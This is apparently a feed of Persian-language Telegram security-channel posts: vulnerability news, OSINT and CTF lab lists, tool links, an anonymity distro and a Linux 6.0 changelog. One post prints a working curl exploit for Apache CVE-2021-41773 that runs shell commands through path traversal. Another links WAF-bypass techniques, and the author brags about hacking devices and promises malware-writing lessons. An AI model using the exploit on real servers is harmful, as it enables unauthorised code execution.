Forwarded from LinSecurity (h3p)
WhatsApp fixes two critical vulnerabilities.
واتسآپ دو مورد از آسیب پذیری حیاتی را برطرف کرد. هر چه سریع تر واتس آپ خود را بروزرسانی کنید.
منبع:
https://www.whatsapp.com/security/advisories/2022/
🔅@LinSecurity
🔅@LinAcademy
واتسآپ دو مورد از آسیب پذیری حیاتی را برطرف کرد. هر چه سریع تر واتس آپ خود را بروزرسانی کنید.
منبع:
https://www.whatsapp.com/security/advisories/2022/
🔅@LinSecurity
🔅@LinAcademy
WhatsApp.com
WhatsApp Security Advisories 2022
WhatsApp Security Advisories 2022 - List of security fixes for WhatsApp products
Forwarded from LinSecurity (h3p)
CVE-2021-41773 Apache 2.4.49
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
#security #Apache #pentest #h3p
🔅@LinSecurity
🔅@LinAcademy
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
#security #Apache #pentest #h3p
🔅@LinSecurity
🔅@LinAcademy
Forwarded from LinSecurity (h3p)
فهرستی از منابع که با آن می توانید اطلاعات از طریق آدرس IP و سایر داده ها پیدا کنید.
• IP Info;
• Whois;
• IP Void;
• Robtex;
• DNS Viz;
• Netcraft;
• Into DNS;
• URL Void;
• URL Scan;
• DNSlytics;
• Pulsedive;
• Alienvault;
• Synapsint;
• View DNS;
• IP Address;
• URL Query;
• Info Sniper;
• IP Checking;
• Central Ops;
• Whoisology;
• DNS History;
• IP 2 Location;
• Domain Help;
• Digital Whois;
• Domain Tools;
• IP Fingerprints;
• Network Tools;
• Threat Jammer;
• Whois Request
• DNS Dumpster;
• Website Informer;
• Hurricane Electric;
• Moz Link Explorer;
• Google Admin Toolbox Dig;
🔅@LinSecurity
🔅@LinAcademy
• IP Info;
• Whois;
• IP Void;
• Robtex;
• DNS Viz;
• Netcraft;
• Into DNS;
• URL Void;
• URL Scan;
• DNSlytics;
• Pulsedive;
• Alienvault;
• Synapsint;
• View DNS;
• IP Address;
• URL Query;
• Info Sniper;
• IP Checking;
• Central Ops;
• Whoisology;
• DNS History;
• IP 2 Location;
• Domain Help;
• Digital Whois;
• Domain Tools;
• IP Fingerprints;
• Network Tools;
• Threat Jammer;
• Whois Request
• DNS Dumpster;
• Website Informer;
• Hurricane Electric;
• Moz Link Explorer;
• Google Admin Toolbox Dig;
🔅@LinSecurity
🔅@LinAcademy
Forwarded from LinApps (ALi Pakrohk)
نام : Across
توضیحات :
یک کلاینت رابط کاربری گرافیکی ساده و مدرن برای v2ray است که با Qt6 و QML نوشته شده است. این یکی از پروژه های اصلی جامعه Arktoria است.
مرجع و سایت :
WebSite
Github
🔅@LinApps
🔅@LinAcademy
توضیحات :
یک کلاینت رابط کاربری گرافیکی ساده و مدرن برای v2ray است که با Qt6 و QML نوشته شده است. این یکی از پروژه های اصلی جامعه Arktoria است.
مرجع و سایت :
WebSite
Github
🔅@LinApps
🔅@LinAcademy
👍6
Forwarded from LinSecurity (h3p)
روش های مختلف برای دور زدن Web-application firewalls (WAFs)
> https://github.com/0xInfection/Awesome-WAF
🔅@LinSecurity
🔅@LinAcademy
> https://github.com/0xInfection/Awesome-WAF
🔅@LinSecurity
🔅@LinAcademy
GitHub
GitHub - 0xInfection/Awesome-WAF: Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥
Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥 - 0xInfection/Awesome-WAF
Forwarded from LinSecurity (h3p)
بزودی دوره تست نفوذ وب حرفه ایی رو مخام براتون بزارم ک مث همه اون پکیج ها نباشه کلی پولشونه ولی چیزی ک یاد میدن مال پونزده سال پیشه منسوخ شده کلن مخام چیزی براتون بزارم از پایه ولی تکنیک هاش جدیدترین باشه بدردتون بخوره بتونین یچی بزنید بانتی بگیرید چرا مگم تکنیک چون من خودم الان با Armitage کلن کار مکنم خیلی ابزار خوبی هست ولی خب دگ توسعه داد نشد تقریبا مشد گف منسوخ شده الان cobalt strike اومده جاش (ولی خو پولیه اونم ک مزارم براتون). البته من خودم با Armitage اندروید 12 و ویندوز 11 زدم خیلی از سرور های لینوکسی زدم و.. کلن همه کار باهاش کردم.
دگ سرتون به درد نیارم. و اینکه وب رو گزاشتم مخام نوشتن بد افزار بزارم بعدش اکسپلویت نویسی بزارم. و هک اندروید ios
اگ سوالی داشتین یا اموزشی چیزی خاستین پیام بدین.
ایدی خودم: @h3pbound
ایدی ناشناسم: https://news.1rj.ru/str/BChatBot?start=sc-411769-2nffnUy
join us!
🔅@LinSecurity
🔅@LinAcademy
دگ سرتون به درد نیارم. و اینکه وب رو گزاشتم مخام نوشتن بد افزار بزارم بعدش اکسپلویت نویسی بزارم. و هک اندروید ios
اگ سوالی داشتین یا اموزشی چیزی خاستین پیام بدین.
ایدی خودم: @h3pbound
ایدی ناشناسم: https://news.1rj.ru/str/BChatBot?start=sc-411769-2nffnUy
join us!
🔅@LinSecurity
🔅@LinAcademy
👍1
Forwarded from LinSecurity (h3p)
*Free Labs to Train Your Pentest / CTF Skills*
-> Academy Hackaflag -BR https://academy.hackaflag.com.br
-> Try Hack Me https://tryhackme.com
-> Attack-Defense https://attackdefense.com
-> alert to win https://alf.nu/alert1
-> CTF Komodo Security https://ctf.komodosec.com
-> CMD Challenge https://cmdchallenge.com
-> Explotation Education https://exploit.education
-> Google CTF https://capturetheflag.withgoogle.com
-> HackTheBox https://www.hackthebox.eu
-> Hackthis https://www.hackthis.co.uk
-> Hacksplaining https://www.hacksplaining.com/exercises
-> Hacker101 https://ctf.hacker101.com
-> Hacker Security https://capturetheflag.com.br
-> Hacking-Lab https://www.hacking-lab.com/index.html
-> HSTRIKE https://hstrike.com
-> ImmersiveLabs https://immersivelabs.com
-> Labs Wizard Security https://labs.wizard-security.net
-> NewbieContest https://www.newbiecontest.org
-> OverTheWire http://overthewire.org
-> Practical Pentest Labs https://practicalpentestlabs.com
-> Pentestlab https://pentesterlab.com
-> Penetration Testing Practice Labs http://www.amanhardikar.com/mindmaps/Practice.html
-> PentestIT LAB https://lab.pentestit.ru
-> PicoCTF https://picoctf.com
-> PWNABLE https://pwnable.kr/play.php
-> Root-Me https://www.root-me.org
-> Root in Jail http://ctf.rootinjail.com
-> Shellter https://shellterlabs.com/pt
-> SANS Challenger https://www.holidayhackchallenge.com
-> SmashTheStack http://smashthestack.org/wargames.html
-> Try Hack Me https://tryhackme.com
-> The Cryptopals Crypto Challenges https://cryptopals.com
-> Vulnhub https://www.vulnhub.com
-> W3Challs https://w3challs.com
-> WeChall http://www.wechall.net
-> Zenk-Security https://www.zenk-security.com/epreuves.php
🔅@LinSecurity
🔅@LinAcademy
-> Academy Hackaflag -BR https://academy.hackaflag.com.br
-> Try Hack Me https://tryhackme.com
-> Attack-Defense https://attackdefense.com
-> alert to win https://alf.nu/alert1
-> CTF Komodo Security https://ctf.komodosec.com
-> CMD Challenge https://cmdchallenge.com
-> Explotation Education https://exploit.education
-> Google CTF https://capturetheflag.withgoogle.com
-> HackTheBox https://www.hackthebox.eu
-> Hackthis https://www.hackthis.co.uk
-> Hacksplaining https://www.hacksplaining.com/exercises
-> Hacker101 https://ctf.hacker101.com
-> Hacker Security https://capturetheflag.com.br
-> Hacking-Lab https://www.hacking-lab.com/index.html
-> HSTRIKE https://hstrike.com
-> ImmersiveLabs https://immersivelabs.com
-> Labs Wizard Security https://labs.wizard-security.net
-> NewbieContest https://www.newbiecontest.org
-> OverTheWire http://overthewire.org
-> Practical Pentest Labs https://practicalpentestlabs.com
-> Pentestlab https://pentesterlab.com
-> Penetration Testing Practice Labs http://www.amanhardikar.com/mindmaps/Practice.html
-> PentestIT LAB https://lab.pentestit.ru
-> PicoCTF https://picoctf.com
-> PWNABLE https://pwnable.kr/play.php
-> Root-Me https://www.root-me.org
-> Root in Jail http://ctf.rootinjail.com
-> Shellter https://shellterlabs.com/pt
-> SANS Challenger https://www.holidayhackchallenge.com
-> SmashTheStack http://smashthestack.org/wargames.html
-> Try Hack Me https://tryhackme.com
-> The Cryptopals Crypto Challenges https://cryptopals.com
-> Vulnhub https://www.vulnhub.com
-> W3Challs https://w3challs.com
-> WeChall http://www.wechall.net
-> Zenk-Security https://www.zenk-security.com/epreuves.php
🔅@LinSecurity
🔅@LinAcademy
Forwarded from LinSecurity (h3p)
هکرها 4 دسته هستند:
1️⃣ هکرهایی که هک های بزرگ و پیچیده انجام میدن ولی صداشون در نمیاد و گردن هم نمیگیرن و نه تایید می کنن و نه تکذیب! همیشه ساکت هستن. (مثل هکرهای دولتی و ماجرای Stuxnet)
2️⃣ هکرهایی که هک میکنن بعدش سر و صدا هم می کنن. مثل گروه هکری گنجشک درنده و...
3️⃣ هکرهایی که اول سر و صدا میکنن بعد هک می کنن! مثل این گروه Anonymous
4️⃣ هکرهایی که اصلا هک نمی کنن ولی سر و صدا میکنن! این افراد خیلی دوست دارن هکر باشن و جلب توجه کنن ولی سوادش رو ندارن. مثل... ؟!
#fun #PingChannel
join us!
🔅@LinSecurity
🔅@LinAcademy
1️⃣ هکرهایی که هک های بزرگ و پیچیده انجام میدن ولی صداشون در نمیاد و گردن هم نمیگیرن و نه تایید می کنن و نه تکذیب! همیشه ساکت هستن. (مثل هکرهای دولتی و ماجرای Stuxnet)
2️⃣ هکرهایی که هک میکنن بعدش سر و صدا هم می کنن. مثل گروه هکری گنجشک درنده و...
3️⃣ هکرهایی که اول سر و صدا میکنن بعد هک می کنن! مثل این گروه Anonymous
4️⃣ هکرهایی که اصلا هک نمی کنن ولی سر و صدا میکنن! این افراد خیلی دوست دارن هکر باشن و جلب توجه کنن ولی سوادش رو ندارن. مثل... ؟!
#fun #PingChannel
join us!
🔅@LinSecurity
🔅@LinAcademy
👍4
Forwarded from LinSecurity (h3p)
لینوکس کداچی : توزیعی امن و غیر قابل ردیابی / با پراکسی های ست شده از قبل.
OS Type: Linux
Based on: Debian
Origin: Oman
Architecture: x86_64
Desktop: Xfce
Category: Live Medium, Privacy, Security
دارای ارتباط امن از طریق تور و وی پی ان است .
این هم ویژگی های منحصر به فردش ..
secure, anti forensic, and anonymous operating system
DNScrypt service
encrypt your files, emails and instant messaging.
Random Mac Generator
RAM Wiping on Shutdown/Reboot
Built in Tor Browser
Bitcoin Wallet
DNSCrypt
Truecrypt/ Vera Crypt
Panic Room/Wipe Ram/Wipe Free Space/Kill OS
System and Security Info on Desktop
🔅@LinSecurity
🔅@LinAcademy
OS Type: Linux
Based on: Debian
Origin: Oman
Architecture: x86_64
Desktop: Xfce
Category: Live Medium, Privacy, Security
دارای ارتباط امن از طریق تور و وی پی ان است .
این هم ویژگی های منحصر به فردش ..
secure, anti forensic, and anonymous operating system
DNScrypt service
encrypt your files, emails and instant messaging.
Random Mac Generator
RAM Wiping on Shutdown/Reboot
Built in Tor Browser
Bitcoin Wallet
DNSCrypt
Truecrypt/ Vera Crypt
Panic Room/Wipe Ram/Wipe Free Space/Kill OS
System and Security Info on Desktop
🔅@LinSecurity
🔅@LinAcademy
🎉2
Forwarded from LinSecurity (h3p)
باز هم Exchange و باز هم کشف یک آسیب پذیری Zero-Day خطرناک که هنوز برای آن Patch ارائه نشده!
▪️محققان امنیتی شرکت امنیت سایبری ویتنامی GTSC دو آسیبپذیری خطرناک Zeroday روی Microsoft Exchange کشف کرده اند که مرتبط به نقصهای قدیمی فاش نشده در سرورهای اکسچنجی است که کاملا Patch شدهاند. متاسفانه Exploit این آسیبپذیری ها در دسترس بوده و توسط هکرهای فرصت طلب در حال استفاده است. این آسیب پذیری ها امکان RCE را در اختیار هکرها قرار می دهد.
▪️هنوز به این دو آسیبپذیری شناسههای CVE اختصاص نیافته است. به گفته GTSC، بهره برداری موفقیت آمیز از این آسیب پذیری ها مهاجم را قادر می سازد تا Web Shell را در اختیار بگیرد و برای خود دسترسی به شبکه قربانی را ایجاد کند. فعالیتهای بیشتری نیز پس از بهرهبرداری مهاجمان توسط GTSC مشاهده شدهاند، از جمله تزریق DLL های مخرب به حافظه، و ایجاد بارهای اضافی روی سرورهای آلوده با استفاده از ابزارWMI (WMIC) .
▪️شایان ذکر است با توجه به ردپاها و Logهای موجود این حرکت به یک گروه چینی منتسب شده است و کوین بومونت، محقق امنیتی، در یک سری توئیت گفته: «می توانم تأیید کنم که تعداد قابل توجهی از سرورهای Exchange مورد حمله قرارگرفتهاند.»
▪️توجه داشته باشید اگر و تنها اگر در شبکه شما OWA از طریق اینترنت در دسترس باشد مهاجم راه دور می تواند به راحتی سرور Exchange شما و به دنبال آن شبکه شما را قربانی کند!
منبع:
#thehackernews #PingChannel
🔅@LinSecurity
🔅@LinAcademy
▪️محققان امنیتی شرکت امنیت سایبری ویتنامی GTSC دو آسیبپذیری خطرناک Zeroday روی Microsoft Exchange کشف کرده اند که مرتبط به نقصهای قدیمی فاش نشده در سرورهای اکسچنجی است که کاملا Patch شدهاند. متاسفانه Exploit این آسیبپذیری ها در دسترس بوده و توسط هکرهای فرصت طلب در حال استفاده است. این آسیب پذیری ها امکان RCE را در اختیار هکرها قرار می دهد.
▪️هنوز به این دو آسیبپذیری شناسههای CVE اختصاص نیافته است. به گفته GTSC، بهره برداری موفقیت آمیز از این آسیب پذیری ها مهاجم را قادر می سازد تا Web Shell را در اختیار بگیرد و برای خود دسترسی به شبکه قربانی را ایجاد کند. فعالیتهای بیشتری نیز پس از بهرهبرداری مهاجمان توسط GTSC مشاهده شدهاند، از جمله تزریق DLL های مخرب به حافظه، و ایجاد بارهای اضافی روی سرورهای آلوده با استفاده از ابزارWMI (WMIC) .
▪️شایان ذکر است با توجه به ردپاها و Logهای موجود این حرکت به یک گروه چینی منتسب شده است و کوین بومونت، محقق امنیتی، در یک سری توئیت گفته: «می توانم تأیید کنم که تعداد قابل توجهی از سرورهای Exchange مورد حمله قرارگرفتهاند.»
▪️توجه داشته باشید اگر و تنها اگر در شبکه شما OWA از طریق اینترنت در دسترس باشد مهاجم راه دور می تواند به راحتی سرور Exchange شما و به دنبال آن شبکه شما را قربانی کند!
منبع:
#thehackernews #PingChannel
🔅@LinSecurity
🔅@LinAcademy
Forwarded from LinSecurity (h3p)
👻هکری در رستوران!👻
روز اول: هکر به رستوران میرود و متوجه میشود میتواند درب نمکدان روی میز را باز کند و هر چیزی که دوست دارد داخل آن بریزد. هکر به خانه برمیگردد و یک نامه با عصبانیت برای صاحب رستوران مینویسد: من ... هستم یک حفره امنیتی در نمکدان شما پیدا کردم . مهاجم میتونه درشو باز کنه و داخلش سم بریزه. لطفا هرچه سریعتر اقدامی اساسی بکنید.
روز دوم: مدیر لابلای درخواست های غذا و نامه های اداری و رسید های پیک، نامه هکر را میبیند و با غرغر میگوید: چه کسی به این مزخرفات اهمیت میدهد؟
روز پنجم: هکر به رستوران میرود و مقداری زهر را در نمکدان روی میز میریزد. سیصد نفر میمیرند و مدیر۳ ماه به دادگاه کشیده میشود تا به همه ثابت کند که عمدا جرمی مرتکب نشده است. هکر نامه دیگری برای مدیر مینوسد و میگوید: خب گفته بودم که!
روز ۹۶: مدیر سفارش یک نمکدان خاص با دربی که قفل دارد را میدهد. مشتریها احساس میکنند که یه چیزی از مفاهیم زندگی رو از دست دادن.
روز ۹۷: هکر به رستوران می آید و متوجه میشود پس از باز شدن قفل نمکدان ، نمک از سوراخ های آن هم به بیرون ریخته میشود و هم میتوان به داخل آن نمک ریخت. نه تنها نمک بلکه هرچیزی! حتی سم! او یک نامه با عصبانیت تمام برای مدیر مینویسد: بعد از مرگ ۳۰۰ نفر و مسمومیت شدید اون همه آدم این چه وضعی است؟! دارید چیکار میکنید؟!
روز ۱۸۸: مدیرمحکوم به بریدن چوب های سیبری شده است و اجازه کار در هیچ رستورانی را ندارد مهندسین بر روی راهی برای یک طرفه کردن جریان خروجی نمک هستند. گارسون ها همه نمک دان ها را جمع کرده اند و نمک را به صورت دستی به مشتری ها میدهند.
روز ۱۹۰: هکر به رستوران میرود و یک نمکدان را از آشپزخانه کش میرود و با دقت در خانه آن را بررسی میکند او یک نامه به مدیر جدید مینویسد: من ... هستم یک نمکدان دزدیدم و این واقعیت که هر کسی میتواند از رستوران نمکدان بدزدد خیلی شرم آور است! مدیر ناراحت به خانه میرود. و...
روز ۱۹۳: هکر به رستوران میرود و میبیند که همه نمکدانها به هم متصل و به میز زنجیر شده اند. او در کنفرانس هکرها در مورد این موضوع گزارش میدهد و تقاضای اعطای نشان حمایت از مشتری ها را برای رستوران میکند.
روز ۱۹۴: بخشی از هکرهای کلاه سیاهی که در کنفرانس بودند در یک اقدام به رستوران میروند و همه نمک ها را از داخل نمکپاش به جیب خود میریزند. هکر یک نامه خشمگینانه به مدیر مینوسد و تاکید میکند که این واقعیت که مشتری شما هر کسی میتواند باشد حتی یک مجرم و میتواند هر کاری که دلش میخواهد بانمکدان بکند میتواند باعث از بین رفتن اعتماد مشتری های صادق شما شود! مسئول پخش نمک باید نمک را فقط در اختیار افراد شناخته شده قرار دهد! مهندسین در حال طراحی نمکدان جدید هستند و پیشخدمت ها فقط به صورت دستی نمک توزیع میکنند مدیر به ویلای خود رفته و خود را در اتاق محبوس کرده است. و مشتری ها برای گرفتن نمک احساس وحشت میکنند. مشتریان رستوران برای گرفتن نمک باید نزد پیشخدمت بروند پاسپورت خود را نشان دهند و یک کد ۸ رقمی بگیرند. با این کد میتوانند از نمک دان های جدید فقط برای یک بار استفاده کنند. اگر فلفل بخواهند باید دوباره همین مسیر را تکرار کنند.
🔅@LinSecurity
🔅@LinAcademy
روز اول: هکر به رستوران میرود و متوجه میشود میتواند درب نمکدان روی میز را باز کند و هر چیزی که دوست دارد داخل آن بریزد. هکر به خانه برمیگردد و یک نامه با عصبانیت برای صاحب رستوران مینویسد: من ... هستم یک حفره امنیتی در نمکدان شما پیدا کردم . مهاجم میتونه درشو باز کنه و داخلش سم بریزه. لطفا هرچه سریعتر اقدامی اساسی بکنید.
روز دوم: مدیر لابلای درخواست های غذا و نامه های اداری و رسید های پیک، نامه هکر را میبیند و با غرغر میگوید: چه کسی به این مزخرفات اهمیت میدهد؟
روز پنجم: هکر به رستوران میرود و مقداری زهر را در نمکدان روی میز میریزد. سیصد نفر میمیرند و مدیر۳ ماه به دادگاه کشیده میشود تا به همه ثابت کند که عمدا جرمی مرتکب نشده است. هکر نامه دیگری برای مدیر مینوسد و میگوید: خب گفته بودم که!
روز ۹۶: مدیر سفارش یک نمکدان خاص با دربی که قفل دارد را میدهد. مشتریها احساس میکنند که یه چیزی از مفاهیم زندگی رو از دست دادن.
روز ۹۷: هکر به رستوران می آید و متوجه میشود پس از باز شدن قفل نمکدان ، نمک از سوراخ های آن هم به بیرون ریخته میشود و هم میتوان به داخل آن نمک ریخت. نه تنها نمک بلکه هرچیزی! حتی سم! او یک نامه با عصبانیت تمام برای مدیر مینویسد: بعد از مرگ ۳۰۰ نفر و مسمومیت شدید اون همه آدم این چه وضعی است؟! دارید چیکار میکنید؟!
روز ۱۸۸: مدیرمحکوم به بریدن چوب های سیبری شده است و اجازه کار در هیچ رستورانی را ندارد مهندسین بر روی راهی برای یک طرفه کردن جریان خروجی نمک هستند. گارسون ها همه نمک دان ها را جمع کرده اند و نمک را به صورت دستی به مشتری ها میدهند.
روز ۱۹۰: هکر به رستوران میرود و یک نمکدان را از آشپزخانه کش میرود و با دقت در خانه آن را بررسی میکند او یک نامه به مدیر جدید مینویسد: من ... هستم یک نمکدان دزدیدم و این واقعیت که هر کسی میتواند از رستوران نمکدان بدزدد خیلی شرم آور است! مدیر ناراحت به خانه میرود. و...
روز ۱۹۳: هکر به رستوران میرود و میبیند که همه نمکدانها به هم متصل و به میز زنجیر شده اند. او در کنفرانس هکرها در مورد این موضوع گزارش میدهد و تقاضای اعطای نشان حمایت از مشتری ها را برای رستوران میکند.
روز ۱۹۴: بخشی از هکرهای کلاه سیاهی که در کنفرانس بودند در یک اقدام به رستوران میروند و همه نمک ها را از داخل نمکپاش به جیب خود میریزند. هکر یک نامه خشمگینانه به مدیر مینوسد و تاکید میکند که این واقعیت که مشتری شما هر کسی میتواند باشد حتی یک مجرم و میتواند هر کاری که دلش میخواهد بانمکدان بکند میتواند باعث از بین رفتن اعتماد مشتری های صادق شما شود! مسئول پخش نمک باید نمک را فقط در اختیار افراد شناخته شده قرار دهد! مهندسین در حال طراحی نمکدان جدید هستند و پیشخدمت ها فقط به صورت دستی نمک توزیع میکنند مدیر به ویلای خود رفته و خود را در اتاق محبوس کرده است. و مشتری ها برای گرفتن نمک احساس وحشت میکنند. مشتریان رستوران برای گرفتن نمک باید نزد پیشخدمت بروند پاسپورت خود را نشان دهند و یک کد ۸ رقمی بگیرند. با این کد میتوانند از نمک دان های جدید فقط برای یک بار استفاده کنند. اگر فلفل بخواهند باید دوباره همین مسیر را تکرار کنند.
🔅@LinSecurity
🔅@LinAcademy
🤣6👍2👎1
Forwarded from LinSecurity (h3p)
dnsReaper :subdomain takeover tool for attackers, bug bounty hunters and the blue team
> https://github.com/punk-security/dnsReaper
🔅@LinSecurity
🔅@LinAcademy
> https://github.com/punk-security/dnsReaper
🔅@LinSecurity
🔅@LinAcademy
GitHub
GitHub - punk-security/dnsReaper: dnsReaper - subdomain takeover tool for attackers, bug bounty hunters and the blue team!
dnsReaper - subdomain takeover tool for attackers, bug bounty hunters and the blue team! - punk-security/dnsReaper
Forwarded from LinSecurity (h3p)
ابزار ویندوز برای تخلیه فایل های بدافزار PE از حافظه به دیسک برای تجزیه و تحلیل.
*Process Dump*
برای سیستم عاملهای ویندوز 32 و 64 بیتی کار میکند و میتواند اجزای حافظه را از پروسس های خاص یا از همه پروسس های در حال اجرا حذف کند. Process Dump از ایجاد و استفاده از یک پایگاه داده clean-hash پشتیبانی می کند، به طوری که می توان از ریختن تمام فایل های تمیز مانند kernel32.dll صرف نظر کرد. ویژگی های اصلی آن عبارتند از:
کد را از یک فرآیند خاص یا همه فرآیندها تخلیه می کند.
ماژولهای مخفی را که به درستی در فرآیندها بارگذاری نشدهاند را پیدا کرده و تخلیه میکند.
تکههای کد شل را پیدا کرده و رها میکند، حتی اگر با یک فایل PE مرتبط نباشند. یک هدر PE و جدول واردات برای تکه ها ایجاد می کند.
واردات را با رویکرد تهاجمی بازسازی می کند.
میتواند در حالت مانیتور تخلیه بسته ('closemon') اجرا شود، جایی که فرآیندها درست قبل از پایان متوقف میشوند و تخلیه میشوند.
چند رشته ای، بنابراین وقتی همه فرآیندهای در حال اجرا را تخلیه می کنید، خیلی سریع انجام می شود.
می تواند یک پایگاه داده هش تمیز ایجاد کند. این را قبل از آلوده شدن دستگاه به بدافزار ایجاد کنید، بنابراین Process Dump فقط اجزای بدافزار مخرب جدید را تخلیه میکند.
https://github.com/glmcdona/Process-Dump
#12H_“[“”hip””,””hip””]
🔅@LinSecurity
*Process Dump*
برای سیستم عاملهای ویندوز 32 و 64 بیتی کار میکند و میتواند اجزای حافظه را از پروسس های خاص یا از همه پروسس های در حال اجرا حذف کند. Process Dump از ایجاد و استفاده از یک پایگاه داده clean-hash پشتیبانی می کند، به طوری که می توان از ریختن تمام فایل های تمیز مانند kernel32.dll صرف نظر کرد. ویژگی های اصلی آن عبارتند از:
کد را از یک فرآیند خاص یا همه فرآیندها تخلیه می کند.
ماژولهای مخفی را که به درستی در فرآیندها بارگذاری نشدهاند را پیدا کرده و تخلیه میکند.
تکههای کد شل را پیدا کرده و رها میکند، حتی اگر با یک فایل PE مرتبط نباشند. یک هدر PE و جدول واردات برای تکه ها ایجاد می کند.
واردات را با رویکرد تهاجمی بازسازی می کند.
میتواند در حالت مانیتور تخلیه بسته ('closemon') اجرا شود، جایی که فرآیندها درست قبل از پایان متوقف میشوند و تخلیه میشوند.
چند رشته ای، بنابراین وقتی همه فرآیندهای در حال اجرا را تخلیه می کنید، خیلی سریع انجام می شود.
می تواند یک پایگاه داده هش تمیز ایجاد کند. این را قبل از آلوده شدن دستگاه به بدافزار ایجاد کنید، بنابراین Process Dump فقط اجزای بدافزار مخرب جدید را تخلیه میکند.
https://github.com/glmcdona/Process-Dump
#12H_“[“”hip””,””hip””]
🔅@LinSecurity
YouTube
An Introduction to Dumping Malware with Process Dump
Demonstrating how to use Process Dump to dump unrecognized modules (in this case TrickBot).
GitHub Page: https://github.com/glmcdona/Process-Dump
GitHub Page: https://github.com/glmcdona/Process-Dump
Forwarded from LinNews (ALi Pakrohk)
LinNews
Photo
همین چند وقت پیش کرنل 6.0 رلیز شد که از رلیز های هیجان انگیزی برای کرنل به حساب میاد:
🟥🟥🟥🟥🟥 درایور ها 🟥🟥🟥🟥🟥
🔴 پشتیبانی درایور i915 از پردازنده های گرافیکی آرک اینتل. با اینکه در مرحله آزمایشی هست و نیاز به فلگ force_probe دارید که از آن استفاده کنید. اما حداقل به تمام زیرساخت های mesa دسترسی دارید.
🔴 پیشرفت بیشتر درایور نسل جدید پردازنده گرافیکی RDNA3 شرکت AMD.
🔴 ساپورت درایور Qualcomm Snapdragon 8xc و ساپورت اولیه برای لپ تاپ Lenovo Thinkpad X13s Arm. هنوز به مرحله کامل شدن نرسیده اما به مرحله قابل استفاده بودن رسیده و راه رو برای تولید هر چه بیشتر لپ تاپ ها با پردازنده ARM هموارتر کرده.
🔴 اضافه شدن درایور هایی از پردازنده های نسل Raptor Lake مثل
TCC cooling
Raptor Lake P RAPL driver (RAPL = Running Average Power Limit)
Raptor Lake USB4 / Thunderbolt
و ...
البته ساپورت اولیه از سیستم صوتی پردازنده های نسل Meteor Lake نیز دیده میشود.
🔴 درایور جدیدی برای سیستم صوتی پردازنده های AMD نسل Raphael و بهبود درایور صوتی پردازنده های نسل Jadeite.
🔴 ساپورت اولیه برای Intel Habana Labs Gaudi 2 accelerator.
🔴 ساپورت کرنل درایور V3D برای Raspberry Pi 4.
🟧🟧🟧🟧🟧 بهبود سازی ها 🟧🟧🟧🟧🟧
🟠 تغییراتی در سیستم اولویت پردازشی و بهبود بالانس NUMA که در پردازنده های Intel و AMD مشاهده میشود.
همینطور در AMD Zen و سایر پردازنده های AMD از این رلیز به بعد از MWAIT به جای HALT استفاده میکنند.
🟠 آپدیت هایی که روی درایور Radeon-Vulkan اعمال شده و برابری آن با AMDVLK....
🟠 افزونه های جدید RSICV مثل Zicbom, Zihintpause و Sstc که به مدیریت بلوک cache کمک میکنند و همینطور کرنل از کانفیگ بیلد پیش فرض مفید تری برای پردازنده های RSICV برخوردار میشود که میتوان با آن Docker و Snap ران کرد.
🟠 بهینه سازی هایی در بخش IO_uring که زیرساخت سیستم های IO مثل هارد و SSD رو شامل میشود. و یک سری تغییرات اولیه امیدوار کننده مثل Btrfs Send Protocol v2.
🟠 پس از مدت ها API مربوط به H.265/HEVC در این رلیز به مرحله استیبل رسیده.
🟠 بهبود کد مربوط به خنثی سازی حفره های امنیتی مثل Meltdown و Retbleed.
🟠 بهبود سازی های زیادی در درایور های VirtIO.
🟠 بهبود سازی هایی در سیستم RNG و سرعت SPI.
🟩🟩🟩🟩🟩 باک فیکس 🟩🟩🟩🟩🟩
🟢 فیکس مشکلاتی مرتبط با کیبورد لپ تاپ هایی با پردازنده AMD Ryzen 6000
🟢 مشکلات تاچ پد و کیبرد بعد از برگشت از Suspend که برای کامپیوتر های TUXEDO و لپ تاپ های Clevo فیکس شده.
و کلی تغییرات دیگر...
منبع 1
منبع 2
منبع 3
#Kernel_News
tarball - view diff - browse
🔅@LinNews
🔅@LinAcademy
🟥🟥🟥🟥🟥 درایور ها 🟥🟥🟥🟥🟥
🔴 پشتیبانی درایور i915 از پردازنده های گرافیکی آرک اینتل. با اینکه در مرحله آزمایشی هست و نیاز به فلگ force_probe دارید که از آن استفاده کنید. اما حداقل به تمام زیرساخت های mesa دسترسی دارید.
🔴 پیشرفت بیشتر درایور نسل جدید پردازنده گرافیکی RDNA3 شرکت AMD.
🔴 ساپورت درایور Qualcomm Snapdragon 8xc و ساپورت اولیه برای لپ تاپ Lenovo Thinkpad X13s Arm. هنوز به مرحله کامل شدن نرسیده اما به مرحله قابل استفاده بودن رسیده و راه رو برای تولید هر چه بیشتر لپ تاپ ها با پردازنده ARM هموارتر کرده.
🔴 اضافه شدن درایور هایی از پردازنده های نسل Raptor Lake مثل
TCC cooling
Raptor Lake P RAPL driver (RAPL = Running Average Power Limit)
Raptor Lake USB4 / Thunderbolt
و ...
البته ساپورت اولیه از سیستم صوتی پردازنده های نسل Meteor Lake نیز دیده میشود.
🔴 درایور جدیدی برای سیستم صوتی پردازنده های AMD نسل Raphael و بهبود درایور صوتی پردازنده های نسل Jadeite.
🔴 ساپورت اولیه برای Intel Habana Labs Gaudi 2 accelerator.
🔴 ساپورت کرنل درایور V3D برای Raspberry Pi 4.
🟧🟧🟧🟧🟧 بهبود سازی ها 🟧🟧🟧🟧🟧
🟠 تغییراتی در سیستم اولویت پردازشی و بهبود بالانس NUMA که در پردازنده های Intel و AMD مشاهده میشود.
همینطور در AMD Zen و سایر پردازنده های AMD از این رلیز به بعد از MWAIT به جای HALT استفاده میکنند.
🟠 آپدیت هایی که روی درایور Radeon-Vulkan اعمال شده و برابری آن با AMDVLK....
🟠 افزونه های جدید RSICV مثل Zicbom, Zihintpause و Sstc که به مدیریت بلوک cache کمک میکنند و همینطور کرنل از کانفیگ بیلد پیش فرض مفید تری برای پردازنده های RSICV برخوردار میشود که میتوان با آن Docker و Snap ران کرد.
🟠 بهینه سازی هایی در بخش IO_uring که زیرساخت سیستم های IO مثل هارد و SSD رو شامل میشود. و یک سری تغییرات اولیه امیدوار کننده مثل Btrfs Send Protocol v2.
🟠 پس از مدت ها API مربوط به H.265/HEVC در این رلیز به مرحله استیبل رسیده.
